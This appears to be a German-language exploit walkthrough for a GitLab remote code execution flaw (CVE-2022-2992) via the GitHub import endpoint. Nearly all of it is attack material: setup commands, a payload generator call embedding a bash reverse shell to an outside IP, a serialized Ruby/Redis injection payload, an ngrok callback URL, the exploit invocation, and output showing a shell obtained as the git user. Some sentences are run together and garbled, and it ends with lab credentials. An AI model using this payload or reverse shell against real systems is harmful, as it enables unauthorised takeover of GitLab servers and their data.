
Authentifizierte Remote-Befehlsausführung in Gitlab über GitHub-Import
Authentifizierte Remote-Befehlsausführung in Gitlab über GitHub-Import.
Eine Schwachstelle in GitLab CE/EE, die alle Versionen von 11.10 vor 15.1.6, alle Versionen ab 15.2 vor 15.2.4, alle Versionen ab 15.3 vor 15.3.2 betrifft, ermöglicht einem authentifizierten Benutzer die Remote-Codeausführung über den Import-from-GitHub-API-Endpunkt.
sudo apt install ruby python3 python3-pip
gem install redis
pip install flask
./ngrok http 5000 aus und speichere die URL.ruby payload_gen.rb 'bash -c "sh -i >& /dev/tcp/172.16.128.129/443 0>&1"'
PAYLOAD = 'ggg\r\n*3\r\n$3\r\nset\r\n$19\r\nsession:gitlab:gggg\r\n$359\r\n\u0004\b[\bc\u0015Gem::SpecFetcherc\u0013Gem::InstallerU:\u0015Gem::Requirement[\u0006o:\u001cGem::Package::TarReader\u0006:\b@ioo:\u0014Net::BufferedIO\u0007;\u0007o:#Gem::Package::TarReader::Entry\u0007:\n@readi\u0000:\f@headerI\"\baaa\u0006:\u0006ET:\u0012@debug_outputo:\u0016Net::WriteAdapter\u0007:\f@socketo:\u0014Gem::RequestSet\u0007:\n@setso;\u000e\u0007;\u000fm\u000bKernel:\u000f@method_id:\u000bsystem:\r@git_setI\"8bash -c \"sh -i >& /dev/tcp/172.16.128.129/443 0>&1\"\u0006;\fT;\u0012:\fresolve'
NGROK_URL = 'https://dc09-41-01-99-69.in.ngrok.io'
HINWEIS: Stelle vor dem Ausführen sicher, dass ngrok und der Flask-Server laufen.
python3 exploit.py -a lunpy-AMEuQE66KcUtNhcharjm5 -u https://dc09-41-01-99-69.in.ngrok.io -t http://gitlab.example
➜ CVE-2022-2992: nc -nlvp 443
listening on [any] 443 ...
connect to [172.16.128.129] from (UNKNOWN) [172.16.128.180] 40270
sh: 0: can't access tty; job control turned off
$ id
uid=998(git) gid=998(git) groups=998(git)
POST /vakzz/public.git/git-upload-pack 200 OK
GET /vakzz/public.git/info/refs 200 OK
GET /api/v3/repos/fake/name 200 OK
GET /api/v3/repositories/12345 200 OK
GET /api/v3/rate_limit 200 OK
GET /api/v3/rate_limit 200 OK
[1] Creating Group
[+] Successfully created group: qogjohpykk
[2] Running flask server
[3] Importing Github Repo
* Serving Flask app "server" (lazy loading)
* Environment: production
WARNING: This is a development server. Do not use it in a production deployment.
Use a production WSGI server instead.
* Debug mode: off
* Running on http://0.0.0.0:5000/ (Press CTRL+C to quit)
127.0.0.1 - - [08/Oct/2022 23:46:03] "GET /api/v3/rate_limit HTTP/1.1" 200 -
127.0.0.1 - - [08/Oct/2022 23:46:03] "GET /api/v3/rate_limit HTTP/1.1" 200 -
127.0.0.1 - - [08/Oct/2022 23:46:03] "GET /api/v3/repositories/12345 HTTP/1.1" 200 -
201
127.0.0.1 - - [08/Oct/2022 23:46:04] "GET /vakzz/public.git/info/refs?service=git-upload-pack HTTP/1.1" 200 -
127.0.0.1 - - [08/Oct/2022 23:46:04] "POST /vakzz/public.git/git-upload-pack HTTP/1.1" 200 -
127.0.0.1 - - [08/Oct/2022 23:46:04] "GET /api/v3/repos/fake/name HTTP/1.1" 200 -
[4] Triggering Payload
[+] Command was executed
/ auf deiner Linux-VM.Benutzername: enox
E-Mail: [email protected]
Passwort: StrongestGitlabPassword
Bei Fragen erreichst du mich auf Discord (Enox#4458)